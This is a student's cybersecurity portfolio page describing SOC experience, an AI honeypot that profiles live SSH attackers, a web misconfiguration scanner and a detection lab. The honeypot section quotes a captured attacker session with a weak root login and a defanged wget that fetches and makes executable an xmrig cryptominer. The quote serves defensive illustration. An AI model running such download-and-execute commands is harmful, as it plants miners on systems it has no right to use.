Available — end-of-study internship · 2026

Security that thinks like the attacker.

I'm Khalil Abdul Karim, a Master's student in Cybersecurity at EPITA working across offensive security, detection engineering, and applied AI. From a hospital SOC to a production honeypot that profiles live attackers, I build tooling that turns raw signal into defensible decisions.

View selected work → View CV
SOC · Pentest · DevSecOps Paris, France EN C1 · FR B2 · AR native
~/khalil — zsh
$ whoami
khalil_abdul_karim — M2 Cybersecurity @ EPITA
 
$ status --availability
> Available · end-of-study internship (2026)
> Focus: SOC · Pentest · DevSecOps
> Location: Paris, FR (open to relocate)
 
$ ./now
> Running: AI Honeypot in production
> 100+ attacker sessions profiled
01

About

// from securing infrastructure to building offensive tooling

I started in software engineering and moved deliberately toward security — because the most interesting problems live where systems break.

Today I work both sides of the line. I've hardened real infrastructure in a hospital SOC, triaging incidents and remediating access-control flaws under production constraints. And I build offensive and deception tooling — most notably an AI honeypot that profiles live attackers and maps their behaviour to MITRE ATT&CK.

That combination is the point: I understand defenders' priorities and how attackers actually operate, and I write code to close the gap between the two.

// Experience
Cybersecurity Intern · SOC N1
Aug 2024 – Feb 2025
New Mazloum Hospital — Lebanon
Wazuh SIEM · Incident Response · RBAC · AppSec
  • Triaged and qualified 3–5 security incidents weekly — log analysis, event correlation, and structured escalation by criticality.
  • Identified and remediated critical access-control vulnerabilities: RBAC hardening, least-privilege enforcement, and stronger authentication across hospital systems.
02

Selected Work

// four projects, framed for impact
Each project is framed: Concept Stack Key Findings Outcome
Flagship

AI Honeypot & Attacker Profiling System

A deception system that doesn't just trap attackers — it understands them.
2026
Concept

A Paramiko-based SSH server deployed on an exposed production VPS, emulating a realistic Linux host to draw real intrusions — then profiling every actor automatically.

Tech Stack
PythonParamikoLLMReactFlaskDockerSQLiteMITRE ATT&CK
Key Features & Findings

Full session capture — credentials, commands, behavioural timing, and network fingerprint — collecting 100+ live attacker sessions in the first 48 hours. An autonomous AI pipeline classifies each actor by skill level, tooling, and intent (cryptomining / ransomware / reconnaissance), maps the behaviour to MITRE ATT&CK, and auto-generates prioritised defensive recommendations.

Outcome

A real-time React dashboard — global attack-origin map, credential heatmap, command timeline, and LLM-generated attacker profiles — streamed live via a Flask API with a 15-second refresh. A self-running threat-intel loop that goes from raw intrusion to actionable defence.

[VPS:22] new session 185.220.xx.xx (Tor exit)
auth root:123456 (honey)
> uname -a; wget hxxp://…/xmrig; chmod +x xmrig
profile intent=cryptomining skill=low tool=automated
mitre T1110 · T1059 · T1496
100+
sessions / 48h
Autonomous
AI profiling pipeline
15s
live dashboard refresh
ATT&CK
behaviour mapped

Web Security Scanner

Misconfiguration & Sensitive Data Exposure — pentest-grade tooling.
2026
Concept

A scanner that crawls a target and surfaces the unglamorous misconfigurations that quietly cause breaches — built for real audit and pentest workflows.

Tech Stack
Node.jsOWASP A02 / A05SSRF ProtectionHTML + JSON Reporting
Key Features

Recursive crawler auto-detecting 5 classes of misconfiguration — missing security headers, insecure cookies, permissive CORS, exposed sensitive files, and info disclosure — across 12–15 URLs per scan.

Outcome

Actionable HTML & JSON reports with a live monitoring dashboard, scan history, and remediation prioritised per finding — a drop-in for an audit or pentest engagement.

SOC Lab — Intrusion Detection on AWS

A full detection environment built to generate and catch real attacks, end to end.
2026
Concept

A complete blue-team lab proving the detection lifecycle — from telemetry collection to alerting — against live offensive activity.

Tech Stack
AWSWazuh (Manager · Indexer · Dashboard)Kali LinuxWindows / Ubuntu agents
Key Features

Deployed a full Wazuh SIEM stack supervising 2 agents, with real attack simulation from Kali — SSH brute force and privilege escalation — validated through detection and alerting.

Outcome

A reproducible detection environment demonstrating end-to-end visibility from raw telemetry to triaged alert.

CareCircle — Secure Telemedicine Platform

Secure-by-design access control for sensitive healthcare data, under GDPR.
2024
Concept

Securing a medical web application handling highly sensitive patient data, with access control and privacy enforced from the ground up.

Tech Stack
NestJSTypeScriptAzure Cognitive ServicesJWTRBACWebSocketsGDPR
Key Features

Granular RBAC across 10–15 endpoints with role-based access (patient / doctor / admin), JWT authentication, and strict input validation.

Outcome

A GDPR-aligned access model proving secure-by-design principles on real healthcare workflows.

03

Capabilities

// offensive, defensive, and the code in between
01

Offensive Security

Web penetration testing
OWASP Top 10
Burp Suite
Nmap
Metasploit
ffuf
Paramiko
Scapy
02

Defensive & Detection

SOC operations
Wazuh SIEM
Wireshark
Nessus
RBAC & access control
Vulnerability analysis
Honeypot & deception tech
Threat intel · LLM attacker profiling
03

Development & Cloud

Python
Node.js · NestJS
TypeScript
AWS · Azure
Docker
Linux · Windows
HTTP · TCP/IP · DNS
04

Background

// education, certifications & languages
// Education
M2 — Cybersecurity
EPITA — Le Kremlin-Bicêtre
2025 – present
Ethical Hacking Program
Semicolon Security — Certification ISA
2025
BSc — Computer Science (SE)
University of Balamand — Lebanon
2021 – 2024
// Certifications
CompTIA Security+ · in progress Information Security Associate
// Languages
Arabic · native English · C1 French · B2
Open to opportunities

Let's talk security.
khalilabdelkarim@outlook.com

I'm looking for an end-of-study internship on an operational security team — SOC, pentest, or DevSecOps. If that's you, I'd love to talk.

Email LinkedIn GitHub